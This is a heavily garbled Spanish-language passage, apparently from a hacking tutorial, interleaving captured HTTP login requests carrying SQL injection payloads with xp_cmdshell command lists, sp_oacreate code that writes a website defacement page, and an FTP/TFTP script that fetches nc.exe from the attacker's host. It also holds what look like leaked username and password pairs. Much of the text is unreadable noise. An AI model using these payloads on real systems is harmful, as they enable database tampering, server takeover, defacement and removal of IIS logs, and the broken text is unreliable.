.5.xxxxxxxxxx.1 Accept: image/gif. Y H + L] ) < 00 .victor. " $+6 4 H " "" !.mguevara/martha.Tiatere1/lima27. */* Referer: http://www. Windows NT 5. deflate User-Agent: Mozilla/4.0.xxxxxxxxxx. image/pjpeg. " 5 " " "9 ) " " " * & " " " """ "& * & " " " .dayana/ne ne.. image/jpeg. ) "9 &" " . " "" 6= !:#.asp?validar=2 HTTP/1. + POST /Login.0 (compatible.asp.. /Login. + ( " . 6 6 " . " ! " " 6 " " "& 9 "" " " ") . ! ") " & "& " ) " .6! .MonicaA/amorcito.8 4 9 " " " . line 85 2> $6 3 4! & ! 6 ( ) ( .com/Login. :!& " " " " (! 6#.application/x-shockwave-flash.aliciafalcon/baby. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.22 carla/cardie. image/x-xbitmap.CMorena/2 11095.Luz_d/carmen. MSIE 6.0) Host: www." " " " ( " . 4 ".

1 Accept: image/gif. = " ( "& + "9 9 6 " " ) " 7 . MSIE 6.xxxxxxxxxx.& ) & " " 9 + " " " & KKKF 9 "& " " " " " " 6 .com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. " " & " " ) " "" ") " ( " E' " & ( ! .asp?validar=2 HTTP/1. */* Referer: http://www.com/Login. image/pjpeg.application/x-shockwave-flash. + 9 " * " E5 9 . " Y H + L " "" "VL1 6 ! ""L VL' L00 +4 4 4 # & . deflate User-Agent: Mozilla/4. " * 'delete from usuarios where UID='Usuario'-- + 1 4 $ " 4 " " " & 4 1#8 .0 (compatible. Windows NT 5." 9 " H " #$% # 6 F !:#. 9 = 6 " 9 " " . " & . & + " 4 .23 POST /Login.0. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . image/x-xbitmap.0) Host: www.xxxxxxxxxx. " . image/jpeg.

" & " 9 = ( " . image/pjpeg. * " 4 " " + & " + & 6 " " POST /Login. Windows NT 5. image/jpeg. " " "+" " " 1#8 . " * #$% # 6 "> " " $ % " ) " II .asp?validar=2 HTTP/1.1 Accept: image/gif. # " " " 6 " ?4.com/Login. deflate User-Agent: Mozilla/4. < $ " " " " 8< " " #0#$%& " ") " 5 . image/x-xbitmap.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.2? 5"= " ". xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . MSIE 6.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.0) Host: www.0 (compatible.0. " ) " 9 <" " " " " ) " & 9 " " " !:#. ! . 6= :)6 7< * 9 " + . .xxxxxxxxxx. " 7 " " ) " 6" " & < "" " " " * 6 "* " >8< " #$% 1: "9 # ! 4 * " " " * " " ! ) ( " & " . */* Referer: http://www.%%L" 9 " & * #0#$% ) < " " ") " " " " < "& . " Y H + L] " " "6 " EL + " L&L +! "" LF00 % & " ( & ! .xxxxxxxxxx. " "& # " & . application/x-shockwave-flash.

" Y H + "L]8N8' " ) < Q " L < L00 :M 9 E . & " "1 & 9 #5 F " " 9 " " & F " " . image/jpeg.xp_cmdshell%27cmd. " * " " "* E/ & .exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " POST /Login.com/Login.application/x-shockwave-flash. 4 " ) 4 " = ) &6 6 " " = " 4 & " " " )" 6 " * "6 "6 " E8 " " " "F + < Q ) ) 4 ") " > > " " < Q ( " .xxxxxxxxxx. Windows NT 5.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA. deflate User-Agent: Mozilla/4. MSIE 6.asp?validar=2 HTTP/1.0) Host: www. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.2@ " " & " 5 " < " "& " ) * ) " * " " " N Q " > "> 4 " " "& " "" " " < Q " " K6 " . ) " " " 6 = ) " * " " * 5 " " ) .0 (compatible.! ) " " " " " 4 " " "9 " ( = " " "" " " 9 " " + " " " ( 6 6= #$% " ". image/x-xbitmap. */* Referer: http://www.0.xxxxxxxxxx.1 Accept: image/gif.. image/pjpeg.dbo.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.

.xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..exe' ! ) " EXEC master.xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master.xp_cmdshell 'type c:\inetpub\wwwroot\alguna_pagina.xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master.log' EXEC master. " " ) 6 &" * & .xp_cmdshell 'NET USER username password' :M& " ) . MyPass 9 .. " ) & " " " "> + >8< # ! "> 9 ) = " " ! " " " " " & #0#$% # 6 " * " "+" " " 6 "* " " " ) " 9 " " ># " " ) " "* " + " " .2 ! " EXEC master.asp' ! " ) EXEC master. ">& " " " " # " >8< # " )7 ) " + ! ">& " " " " & >1 4 " " 'exec master.xp_cmdshell 'DIR c:\winnt\system32\logfiles\w3svc1\' EXEC master.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc1\ filelog. " 8< " " " ... ..exe c:\inetpub\wwwroot\chroot. " " ! " = " ...sp_addlogin MyUser.xp_cmdshell 'copy c:\winnt\system32\cmd...xp_cmdshell 'dir c:\inetpub\wwwroot\' ! 6 9 6 EXEC master.

'writeline'. '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil. " + " . "* . Q ) "M Q .. '<!--" "-></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f. . &9 4 . 1 exec @ret=sp_oamethod @f. @ret int exec sp_oacreate 'scripting. Q .. NULL.</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f.] La idea es crear una pagina html o asp. " > . 'c:\web-hosting\attajdid\index3. @o out exec sp_oamethod @o. " " " ( " " " ) 4 " " + #$% 9 4 > "& 9 " " ( 67" < #$% E$ + " #$% 6= #5& " ) * " #$%& ) " "" ) " & ".$ %+ ) % " " " 4 & ) * ( ) Q ..] declare @o int. NULL. " 1 & M <& 6 Q . 6 Q" 6 Q " Q Q 6 . NULL. @f out. Q "6 + ) .-'F& " " " 322& 9 " # ) 7 9 9 < < < < < & " " " " " "+ 7 ' 4 " & " " " H " " . '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f..filesystemobject'.. 'writeline'. si en el sitio objetivo se encuentra activo y funciónando un webserver [. " >& 7 " " ----.html'. * + . 'createtextfile'. " . @f int. 'writeline'. NULL..Extracto -----------------------------------------[. 'writeline'. (( # < " " " . @t int.2B " " " " " Q Q Q " Q *. Q . 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>' . M + & * " " * + " % " < < < < > * " +( 9 :.

'writeline'. 'writeline'. '<TBODY> <TR> <TD bgColor=#d20000>&nbsp. 'writeline'. 'writeline'. 'guest' EXECUTE @ret=sp_oamethod @f. 'writeline'. 'c:\get. 'writeline'. NULL. 'createtextfile'. NULL. 'writeline'. NULL.. 'writeline'. NULL. NULL.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master. 'bgColor=#d20000>&nbsp . '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f. '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f. 'writeline'. 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos. @f out.</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f. @t int.2C exec @ret=sp_oamethod @f. 'writeline'. 1 EXECUTE @ret=sp_oamethod @f. 'guest' EXECUTE @ret=sp_oamethod @f. '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f. NULL. 'writeline'.</TD></TR><!--" "-></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f.txt'.xp_cmdshell 'FTP -s c:\get. 'quit' EXECUTE master. 'get nc. NULL. 'guest' EXECUTE @ret=sp_oamethod @f. NULL. '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f. NULL.Creamos un archivo get.txt para utilizar luego ftp declare @o int.filesystemobject'. '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f. @f int. '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f. NULL. 'user anonymous' EXECUTE @ret=sp_oamethod @f. NULL.xp_cmdshell 'TFTP -i NUESTROHOST GET c:\mi_local_file c:\remote_file' . @o out EXECUTE sp_oamethod @o. 'writeline'. NULL. NULL. 'writeline'. @ret int EXECUTE sp_oacreate 'scripting. NULL. NULL. 'writeline'. 'writeline'.exe' EXECUTE @ret=sp_oamethod @f.

a = " " J "" " + .3 ----.J #$% 4 ) 4 " ! " ` : . E .! . & ) " " " " ( " * " 6" " #0#$% # 6 & ") " . &c " & M : . " Q )4 `& 6 `&` ` aa M & : . ") " " 0 . < a )4 `& . a Va " 3 # ) " " ) " 9 7 9 & "IF * ) 5 * + " 7" 6 " " &9 "& " 6" " " " .: : .! .! . * "+" )4 F + " 7 " )4 6 " ) " " . " D " ) + = " & J " " " ) ) " " * " " >. " 9 " 8 " 4 " . "" " " ) " " & " + " . " "9 9 " . " " G )5 " " " L 1.Extracto -----------------------------------------:M& ) )4 " 6 " *=" " " " " # 6 " .A %8L > > + = " "+ ) & + #$% 9 6 ) <" 6 " ( " E: ) = " * " " " #$% + " ) # " " +! 4 > " " #$% 4 * # ' % #0#$% ) . &" 7 " " : . " " &" " Q +" Q 9 " " )4 :%8 " " * #$% " . " Q .

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

"& " "A = & *. " "" " 9 " ) " + = " 7< " + " " 8 " G " "" "+ " " " " 6 " E. " . * . 6" " " . F H *9 6 " " " " " #0#$% # 6 8" ) ( " 6 . & " " " * " . " " " . 6 ) " ) " " " " " . " " 9 " " " " 7 " " " "& 6 " " "& . 6 ( " " " " ' " 6 " .8 5 G " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ( M" ". G " " " " " ." 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " ." ) #0#$% # 6 " " 6 & <" "9 " " + "* " " +# 6 "! " ) " "& 6 " " . ) " " "A % B #0#$% # 6 " 6 " " 6 " . ( # #. & 9 . 9 " " * " & +" ") " 7 " + " " * " " " ") " " " ) + +" ( " " " ) 4 " 6 " " " .= " ) " ) " *= 4 & 74 . " & " & " * " " #0#$%F 8" . ( & M" ) *. " "" * " * & " ) "" 6 > . 6 " * " * E " " " . * ) . 6 8 ! " " .3 ! " " " . " . > + " " " ) = 6 " #$% 4 # ) * " " * M . * " "* "& " " ) = " . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . E. " 6 " ) " "" " . " ) " . " D " ". " & " " + " "" ") " & ") < M .

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

6. "J . II )+ 5 . )5 "0 0 @0) ( " "* " " " M + "B 01 0 0' 0S " " . " " / " " 6 " * " * . & " 6 = " . " = &+9 . " <" " " " " . ' % . " " " 5 " >5 .33 M M M M " " " " << " " " " " " + . ! = #0#$%& "9 + 67" " +# * " " . 1 " ( + . G "9 . " " #$% 4 % d " " " * > 9 " & # 9 . & . " " / ! 9 " # & . > > < 1 ) " ) " " " + 9 " ") 6 9 9 " " " " "6 " "* ( " " ") ( " 9 " " " ( & 9 " * "9 " "& " < ") " "" " " " " " " " )7 . " " E8" " " " " . 8 " * * " * " )+ 1 F )+ " 59 = . " " #9 M ( + . 6 " " " " " " " . D . "KF " " 9 D " +* O1 < . " & = " " MQJ % ! ( ( ** = " . :! "9 " . " " .( + + . (( # + . G "9 < + . " " " * " ) ") "I )+ 5 . 1. " ) 9 " " .
